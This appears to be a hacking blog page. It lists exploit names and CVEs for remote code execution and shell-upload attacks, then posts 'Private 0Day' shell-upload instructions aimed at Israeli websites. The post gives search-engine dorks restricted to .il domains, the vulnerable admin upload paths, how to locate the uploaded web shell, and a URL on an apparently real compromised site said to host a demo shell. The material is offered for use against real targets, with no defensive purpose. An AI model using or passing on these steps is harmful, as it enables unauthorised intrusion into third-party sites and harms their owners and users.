All About Hacking & Cybersecurity

Drok3r: Best Exploits phpMoAdmin Remote Code Execution (CVE-2015-2208) LotusCMS Remote Code Execution (OSVDB-75095) ElasticSearch Remote Code Execution (CVE-2015-1427) ShellShock (httpd) Remote Code Execution (CVE-2014-6271) IISlap - http.sys Denial of Service/RCE PoC (DoS only). (MS-15-034) se0wned - Seowintech Router diagnostic.cgi remote root WPsh0pwn - Wordpress WPShop eCommerce Shell Upload (WPVDB-7830) nmediapwn - Wordpress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload pwnflow - Wordpress Work the flow file upload 2.5.2 Shell Upload delusions - Wordpress InfusionSoft Gravity Forms Shell Upload (CVE-2014-6446) suiteshell - SuiteCRM Post-Auth Remote Code Execution (CVE-2015-NOTYET) suiteracer - SuiteCRM Post-Auth Remote Code Execution Race Condition (CVE-2015-xxxx) unsanitary - Address Sanitizer + Setuid Binary = Local Root exploit (LD_PRELOAD vector) DiamondFox - DiamondFox Botnet C&C Panel Shell Upload DoubtfullyMalignant - BenignCertain

Israel Private 0Day Shell Upload Exploits ASP|PHP  Israel Private 0Day Shell Upload Exploits ASP|PHP: Hey Guyz ..Today I found some FRESH Private Israel 0Day Exploits . So i thought of sharing with you all....So lets Start.... Israel Private 0Day Shell Upload Exploits ASP|PHP 1). First 0Day Shell Upload ASP | PHP # Google Dork -|- 'prod1.aspx?pid=' site:il or You can also create your own Dork # Exploit Upload 1 -|- /admin/adminbanners.aspx # Exploit Upload 2 -|- /admin/AdminPics.aspx When you upload your asp or php shell just Check Code Source of the page you will see your url Shell example: /banners/1a62aa_bddf_4e3d_8464_f0f62ac8c7.asp  # DEMO SHELL -|- http://littlebags.co.il/banners/1dea62aa_bddf_4e3d_8464_f640f62ac8c7.asp Israel Private 0Day Shell Upload Exploits ASP|PHP 2). Second 0day Upload # Dork -|- inurl:/index.php?categoryID= site:il inurl:/index.php?ukey=auth inurl:/index.php?ukey=feedback inurl:/index.php?ukey=pricelist